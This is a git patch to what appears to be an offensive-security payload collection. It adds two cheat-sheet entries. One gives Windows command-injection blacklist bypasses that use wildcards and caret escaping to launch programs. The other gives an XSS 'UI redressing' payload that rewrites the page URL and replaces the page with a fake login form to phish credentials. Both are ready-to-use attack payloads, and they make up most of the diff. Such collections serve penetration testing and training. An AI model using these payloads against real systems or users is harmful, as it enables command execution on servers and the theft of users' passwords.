From ea0bddc18a12d6ad46e763fbc52f93481b1a5620 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Tue, 8 Jan 2019 20:49:05 +0100
Subject: [PATCH] Windows RCE wildcard + XSS UI redressing

---
 Remote commands execution/README.md | 6 ++++++
 XSS injection/README.md             | 9 +++++++++
 2 files changed, 15 insertions(+)

diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 38d3589..828a481 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```
 
+Bypass blacklisted word with wildcards
+```powershell
+powershell C:\*\*2\n??e*d.*? # notepad
+@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
+```
+
 Bypass zsh/bash/sh blacklist
 
 ```powershell
diff --git a/XSS injection/README.md b/XSS injection/README.md
index 781975e..9df2b3e 100644
--- a/XSS injection/README.md	
+++ b/XSS injection/README.md	
@@ -33,6 +33,15 @@ fclose($fp);
 ?>
 ```
 
+UI redressing (Sophisticated phishing)
+
+```html
+<script>
+history.replaceState(null, null, '../../../login');
+document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
+</script>
+```
+
 Keylogger for XSS
 
 ```javascript